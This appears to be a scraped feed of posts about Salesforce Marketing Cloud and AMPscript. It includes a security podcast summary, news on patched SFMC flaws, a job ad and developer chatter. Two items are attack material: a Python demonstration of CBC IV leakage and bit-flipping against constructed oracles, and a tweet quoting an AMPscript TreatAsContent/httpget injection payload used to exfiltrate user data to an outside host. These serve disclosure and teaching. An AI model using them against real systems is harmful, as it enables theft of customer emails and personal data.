HackerNotes TLDR for episode 174: blog.criticalthinkingpodcast…
► Salesforce Marketing Cloud got popped through AMPscript template injection plus an unauthenticated CBC bit-flipping attack. The 8 null-byte trick to leak the IV is the kind of crypto move you should keep in mind.
► cPanel WHM auth bypass (CVE-2026-41940) chains a CRLF injection into a session file on disk with two different auth methods, then beats a cache to land a pre-auth session.
► A single .git directory delete on Google Cloud Looker leads to RCE because git falls back to reading config from the working directory when .git is missing. Variant goldmine for any code sandbox that lets you touch the filesystem.
► Skill optimizer from Tessl, prompt injection to deterministic XSS, and GPT-5.5 actually competing with Claude on black-box hacking. Lots of moving pieces this week.
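The two CBC primitives the post above names, recovering a static IV through an unauthenticated decryption oracle by inserting one block of null bytes, and then bit-flipping a chosen plaintext block, as an added example that is not code from the post, the podcast or Salesforce. It stands in for the real block cipher with a small HMAC-based Feistel cipher on 8-byte blocks (the attack does not depend on which cipher is used), and the key, IV, the `server_issue`/`server_open` oracles and the `oid=...;sid=...` token layout are all constructed assumptions; the actual SFMC qs format is not described on this page.

```python
import hashlib
import hmac
import os

BLOCK = 8  # 8-byte blocks, as with 3DES; "8 null bytes" in the post is one such block


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# --- toy Feistel block cipher: a stand-in for the real cipher, keyed via HMAC-SHA256 ---
def _f(key: bytes, half: bytes, rnd: int) -> bytes:
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:4]


def enc_block(key: bytes, block: bytes) -> bytes:
    l, r = block[:4], block[4:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, r, rnd))
    return l + r


def dec_block(key: bytes, block: bytes) -> bytes:
    l, r = block[:4], block[4:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r


def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(padded), BLOCK):
        prev = enc_block(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt_raw(key: bytes, iv: bytes, ct: bytes) -> bytes:
    # No MAC and no padding check: every block is decrypted and returned as-is.
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out.append(_xor(dec_block(key, blk), prev))
        prev = blk
    return b"".join(out)


# --- constructed server side: static secret key and static secret IV, never sent to the client ---
SERVER_KEY = os.urandom(16)
SERVER_IV = os.urandom(BLOCK)


def server_issue(fields: bytes) -> bytes:
    """Encryption oracle: the link builder encrypts attacker-influenced fields (constructed)."""
    return cbc_encrypt(SERVER_KEY, SERVER_IV, pad(fields))


def server_open(token: bytes) -> bytes:
    """Decryption oracle: the decrypted bytes are reflected to the caller (constructed)."""
    return cbc_decrypt_raw(SERVER_KEY, SERVER_IV, token)


# --- attacker side ---
def recover_iv(token: bytes) -> bytes:
    """Leak the static IV with one query: submit C1 || 00*8 || C1.
    Block 1 decrypts to D(C1) ^ IV, block 3 to D(C1) ^ 0 = D(C1); XOR them and the IV falls out."""
    c1 = token[:BLOCK]
    pt = server_open(c1 + bytes(BLOCK) + c1)
    return _xor(pt[:BLOCK], pt[2 * BLOCK:3 * BLOCK])


def flip_block(token: bytes, idx: int, old: bytes, new: bytes) -> bytes:
    """Rewrite plaintext block idx (idx >= 1) to `new` by XORing old^new into ciphertext block idx-1.
    Block idx-1 turns into garbage; block 0 cannot be targeted this way because its partner is the IV."""
    if idx < 1 or len(old) != BLOCK or len(new) != BLOCK:
        raise ValueError("idx must be >= 1 and old/new must be one block")
    start = (idx - 1) * BLOCK
    prev = token[start:start + BLOCK]
    return token[:start] + _xor(prev, _xor(old, new)) + token[start + BLOCK:]


if __name__ == "__main__":
    tok = server_issue(b"oid=1111;sid=2222")  # blocks: "oid=1111" | ";sid=222" | "2" + padding
    print("IV recovered:", recover_iv(tok) == SERVER_IV)
    forged = flip_block(tok, 1, b";sid=222", b";sid=999")
    print("forged plaintext:", server_open(forged))
```

The forged token decrypts with `;sid=999` in its second block while the first block becomes pseudo-random bytes; whether a real parser tolerates that garbled prefix is exactly the property a practitioner would test next, and knowing the IV lets the attacker compute what that prefix will be from a single decryption of the modified block.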
『Salesforce deployed AES-GCM encryption across the platform, expired all links created prior to January 23, 2026 at 21:00 UTC, and disabled double evaluation of email subject line AMPscript.』 How we Read All Your Emails in Salesforce Marketing Cloud slcyber.io/research-center/g…
Multiple critical vulnerabilities have been fixed in Salesforce Marketing Cloud. An attacker could potentially have obtained customer emails and subscriber information across organizations. The problems lay in SFMC's template processing and shared-infrastructure design. AMPScript and SSJS can dynamically insert customer names and email addresses, but some features such as "TreatAsContent" were designed to re-evaluate input strings as template code. In addition, subject-line templates were double-evaluated under the old behaviour, so AMPScript embedded in a subscriber name could be executed. The researchers confirmed that internal data views such as _Subscribers and _Sent could be accessed with the LookupRows function, which made it possible to retrieve sent emails, subscriber lists, click history and even SMS tracking information. More serious still was the cryptography of the "view email in browser" feature. The qs parameter used on customer-specific subdomains such as view.example.com relied on unauthenticated CBC encryption in the old scheme, so a padding-oracle attack was possible. Searchlight Cyber's researchers abused AMPScript's MicrositeURL function to forge valid qs values. Because SFMC shared a static encryption key across multiple tenants, an attacker could enumerate email contents and subscriber information belonging to other organizations. Moreover, the older URL format still used a simple XOR cipher, allowing fast analysis. Salesforce assigned multiple CVEs and rolled out fixes between January 21 and 24, 2026. Along with migrating to AES-GCM, rotating keys and disabling double evaluation of subject lines, it invalidated worldwide all tracking links and CloudPages links generated before January 21, 2026. It states that no exploitation has been confirmed at this time. gbhackers.com/salesforce-mar…
ampscript is crazy. this post reminded me that shubs, @evanconnelly, and I popped a really sick ampscript data exfil of all users back in oct '24 with only 50 chars of input with this payload in a first name field: FN=%%=TreatAsContent(httpget("http://2f[.]gg/"))=%%
Earlier this year @SLCyberSec’s research team disclosed a vulnerability that allowed us to leak PII and emails stored inside Salesforce Marketing Cloud instances, for any customer, without authentication. You can read more about our research here: slcyber.io/research-center/g…
🇦🇺 Hiring: Salesforce Marketing Cloud Consultant 📍Fully Remote, Australia
They are seeking experienced Salesforce Marketing Cloud Consultants to join their team. Multiple positions are available, and you can choose between contract or permanent roles. Work from anywhere in Australia while supporting enterprise-level Salesforce implementations. As a Senior Marketing Cloud Consultant, you will design, build, and optimise Salesforce Marketing Cloud solutions across multiple Salesforce Clouds. You'll collaborate with stakeholders and cross-functional teams to deliver high-impact marketing automation, customer journeys, and cross-cloud integrations.
Key Responsibilities:
- Design & implement Salesforce Marketing Cloud solutions
- Build customer journeys, segments, and automated workflows
- Work with Developers, Architects & BAs on cross-cloud integrations
- Provide best-practice guidance across Marketing Cloud tools
- Facilitate workshops & training for client teams
- Stay updated on Salesforce releases & ecosystem trends
- Implement Personalisation (Interaction Studio) & Intelligence (Datorama)
Key Requirements:
- 3 years as a Salesforce Marketing Cloud Consultant
- Strong skills in AMPscript, SQL, REST/SOAP APIs
- Experience designing multi-channel marketing campaigns
- Excellent stakeholder communication
- Salesforce certifications highly valued
- Experience with Data Cloud (CDP) or Audience Studio is a plus
- Must have full Australian work rights
Why Join Them?
- Multiple positions available (choose contract or permanent)
- Fully remote role 🌏
- Work on diverse, high-impact client projects
- Exposure to advanced Salesforce multi-cloud environments
- Supportive and collaborative team culture
- Competitive daily rate or permanent salary package
Apply Below: apply.jobadder.com/au6/2553/…
I'm starting to learn Salesforce and AMPscript 👩🏻‍💻
i will fight for my life when i have to do more than basic html and ampscript but for now, falalalalala
Replying to @MarketingCloud
Use Automation Studio with Triggered Sends to automate personalized emails in real-time. Combine with AMPscript for dynamic content—saves time and boosts engagement! #MarketingChats #MomentMarketers #MarketingChampions
31 Mar 2025
My work this week:
- Keep on figuring out how to get Liquid variables in AMPscript to work in Taxi
- Build 1 complicated (all the gradients and transparency!) newsletter template
- Build 10 franken-emails
- Edits to birthday email
17 Feb 2025
This week's work:
- Write AMPscript for dynamic content so 1 template can serve 3 uses
- Code new footer w/ dynamic content for whole code base
- Test, edit, & build new modules in a system I coded last year
- Build 2 emails utilizing existing code, while looking for ways to improve
2 Jan 2025
AES Encryption with AMPScript: Resolving Discrepancies crsinfosolutions.com/aes-enc…
🚀 Countdown starts! #DubaiDreamin! I’ll be speaking on "Elevating Marketing Campaigns with #AMPscript" 📈 Join me to explore how AMPscript can revolutionize marketing in Salesforce Marketing Cloud. Let’s connect if you’re attending! 🔗 #MarketingChampion #MomentMarkters
🌟 We are thrilled to announce that Tarun Gupta will join us as a speaker at Dubai Dreamin'!🌟 📢 Session Title: Elevating Marketing Campaigns with AMPscript It’s #DD24 and #DubaiDreamin24
🌟 We are thrilled to announce that @imchinmays will join us as a speaker at Dubai Dreamin' 🌟 📢 Session Title: Engagement Split using AMPscript It’s #DD24 and #DubaiDreamin24
20 Sep 2024
love working in CRM because seeing the “FIRSTNAME” has made me feel like laughing and crying. what do you mean the person who built the email thought this was how ampscript worked. every single birthday email that gets sent is going to say this. tears in my eyes fr
how sweet they want me to give them more of my money xx
11 Sep 2024
Scripting languages, let's get some standardization of if/else syntax, shall we? elseif vs elsif vs elif is frustrating to me. #emailgeeks #scriptinglanguages #emailpeeps #hubspot #handlebars #ampscript
Replying to @HeyItsShadei
N learn AMPscript
Replying to @Yes__Goodie
He knows “Ampscript”, that’s why he cooked this offer as well lol it’s a language marketing cloud uses as well, not a lot of folks know it
25 Jun 2024
I just finished my first RSS feed in an SFMC Email. Ampscript loops and iteration FTW! #emailgeeks #emailpeeps #emaildev #emaildevs #email